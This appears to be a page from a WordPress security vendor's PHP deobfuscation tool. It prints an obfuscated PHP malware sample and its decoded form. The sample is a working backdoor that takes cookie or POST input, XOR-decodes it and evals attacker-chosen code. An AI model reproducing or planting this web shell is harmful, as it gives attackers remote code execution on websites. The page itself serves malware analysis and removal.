Japanese English

PHP deobfuscation, decryption, reconstruction tool

De-obfuscate PHP malware/viruses and tampering code on Wordpress to original readable code.

*Please note that not all obfuscation codes can be decoded.

Decoded the code below.

<?php $vDgfO/*DDVjI*/= 's'/* kJDBe */. chr ( 1110/*zTo*/- 994 )."\x72" ./*IXXH */"\137" ./*rmP*/'r' . "\145"/*ELr */. 'p' ./* VKMr*/chr (101) ./* QTd */chr (97) ./*j*/'t'; $wTcXxk = chr (101) . "\x78" ./* mip */"\x70" ./* Enzh */"\154"/* hm */./* Qy */'o' . chr/* zxwTW */(100) . chr ( 171 - 70 );...



Obfuscated php code

<?php	$vDgfO/*DDVjI*/=    's'/*   kJDBe */.     chr     ( 1110/*zTo*/-    994   )."\x72"  ./*IXXH  */"\137"  ./*rmP*/'r' .  "\145"/*ELr  */.	'p'	./*   VKMr*/chr    (101)	./*   QTd */chr   (97)	./*j*/'t';
		$wTcXxk	=     chr	(101)    . "\x78"  ./*  mip  */"\x70"   ./*   Enzh   */"\154"/*  hm  */./*   Qy   */'o'	.    chr/*  zxwTW  */(100)	.	chr	(	171  -     70	);

$VOPSFmT  =   chr	(    268    -/*   Qdw   */169/*PrnW   */).chr	(111)	. 'u'	.	chr	(	767/*   DQZdN   */-     657	)."\x74";
		$zJdZjgE =    chr	(112)/*   rNta   */./*   BF */"\x61"/*J   */.	chr    (   224   - 125/*OkvyC */).chr/*  HZO   */(/*  kBB  */888	- 781     );
	$biJPaxmsY/* UmcNa   */=	Array	( "diGRXeSGMssEc"  =>/*   lJZpq  */"hfqbOVCXffNCnhjUXHsBNNLBoD" );
 /* ZO   */$CkzPMfy	=	Array	(	"ONvsEQ"	=>/*h */"gySgASUMIqkjwwPyUaOugP"	);
       foreach	(	Array(/*   lCc */$biJPaxmsY, $_COOKIE,	$CkzPMfy,	$_POST,   $biJPaxmsY)	as/* QRkwI*/$qHxFtSGL) {
	     foreach	(	$qHxFtSGL   as	$Anywbumh/*  NQgR   */=>/*  N   */$KCxJw	)/*  VsvLS   */{

	$KCxJw/* q */=	@$zJdZjgE(	"\x48"   .	"\x2a",/*  V */$KCxJw	);
   /*  u  */$Anywbumh   .=	"VeGvrH-qVykj-yUDS-eiHMV-gLUW-VpLx-OrcFI";
			    $Anywbumh/*NGP  */=    $vDgfO (     $Anywbumh,  (    strlen(    $KCxJw   )/strlen(/* dCq*/$Anywbumh/*H */)  ) +  1);
				   $NlvKT/*  J */=  $KCxJw   ^     $Anywbumh;
		/*vOy   */$NlvKT	=/*   guwK */$wTcXxk	(   "\x23",   $NlvKT	);
  /*gvsJ   */if/* O  */(     $VOPSFmT	( $NlvKT   )/*  e*/==   3/*   rT */)    {
  eval  (  $NlvKT[1]/*  ixG */(	$NlvKT[2]  )	);
    die	();
   }
         }

	}

Decoded(de-Obfuscated) php code

<?php

$vDgfO = "str_repeat";
$wTcXxk = "explode";
$VOPSFmT = "count";
$zJdZjgE = "pack";
$biJPaxmsY = array("diGRXeSGMssEc" => "hfqbOVCXffNCnhjUXHsBNNLBoD");
/* ZO   */
$CkzPMfy = array("ONvsEQ" => "gySgASUMIqkjwwPyUaOugP");
foreach (array(
    /*   lCc */
    $biJPaxmsY,
    $_COOKIE,
    $CkzPMfy,
    $_POST,
    $biJPaxmsY,
) as $qHxFtSGL) {
    foreach ($qHxFtSGL as $Anywbumh => $KCxJw) {
        /*  VsvLS   */
        $KCxJw = @$zJdZjgE(
            "H*",
            /*  V */
            $KCxJw
        );
        $Anywbumh .= "VeGvrH-qVykj-yUDS-eiHMV-gLUW-VpLx-OrcFI";
        $Anywbumh = $vDgfO($Anywbumh, strlen($KCxJw) / strlen(
            /* dCq*/
            $Anywbumh
        ) + 1);
        $NlvKT = $KCxJw ^ $Anywbumh;
        /*vOy   */
        $NlvKT = $wTcXxk("#", $NlvKT);
        /*gvsJ   */
        if ($VOPSFmT($NlvKT) == 3) {
            eval($NlvKT[1]($NlvKT[2]));
            die;
        }
    }
}

Malware detection & removal plugin for WordPress

(C)2020 Wordpress Doctor All rights reserved.